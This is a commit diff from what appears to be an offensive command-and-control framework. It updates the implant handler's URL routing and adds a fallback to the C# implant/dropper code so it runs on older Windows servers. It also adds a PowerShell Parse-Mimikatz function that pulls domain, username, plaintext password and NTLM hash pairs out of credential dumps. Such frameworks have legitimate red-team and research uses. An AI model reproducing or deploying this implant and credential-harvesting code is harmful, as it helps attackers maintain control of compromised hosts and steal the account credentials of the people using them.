Truncated large output in CSV/HTML to stop this being > 100MB. Re-added Parse-Mimikatz feature. Updated CS dropper to work on Server 2003 with .NET v4.
parent
8a092df9d6
commit
1b76ccfe57
|
@ -149,6 +149,8 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
implant_type = "C#"
|
||||
if s.path == ("%s?p?c" % new_implant_url):
|
||||
implant_type = "C#"
|
||||
if s.path == ("%s?d?c" % new_implant_url):
|
||||
implant_type = "C#"
|
||||
|
||||
if implant_type == "C#":
|
||||
cookieVal = (s.cookieHeader).replace("SessionID=","")
|
||||
|
|
|
@ -174,7 +174,13 @@ public class Program
|
|||
{
|
||||
if (Convert.ToDateTime("#REPLACEKILLDATE#") > DateTime.Now)
|
||||
{
|
||||
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
|
||||
var u = "";
|
||||
try
|
||||
{
|
||||
u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
|
||||
} catch {
|
||||
u = System.Environment.UserName;
|
||||
}
|
||||
if (IsHighIntegrity())
|
||||
u += "*";
|
||||
var dn = System.Environment.UserDomainName;
|
||||
|
|
4
HTML.py
4
HTML.py
|
@ -403,6 +403,10 @@ __________ .__. _________ ________
|
|||
framelen = frame['RandomURI'].count()
|
||||
for x in range(0, framelen):
|
||||
try:
|
||||
if (len(frame['Output'][x]) > 1000032):
|
||||
print "[-] Truncating output as this row is over 10mb:"
|
||||
print frame['Command'][x]
|
||||
frame['Output'][x] = "Truncated"
|
||||
frame['RandomURI'][x]
|
||||
a = get_htmlimplant(str(frame['RandomURI'][x]))
|
||||
frame['RandomURI'][x] = a[11] + "\\" + a[2] + " @ " + a[3]
|
||||
|
|
|
@ -2743,3 +2743,107 @@ $results = Main;
|
|||
"Hostname: $HostName / $DomainSID";
|
||||
$results
|
||||
}
|
||||
|
||||
|
||||
|
||||
function Parse-Mimikatz {
|
||||
param(
|
||||
[Parameter(
|
||||
Position=0,
|
||||
Mandatory=$true,
|
||||
ValueFromPipeline=$true,
|
||||
ValueFromPipelineByPropertyName=$true)
|
||||
]
|
||||
[String[]]$raw
|
||||
)
|
||||
|
||||
# msv
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=msv :).*?(?=tspkg :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("NTLM")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=tspkg :).*?(?=wdigest :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Password")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=wdigest :).*?(?=kerberos :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Password")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=kerberos :).*?(?=ssp :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Password")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue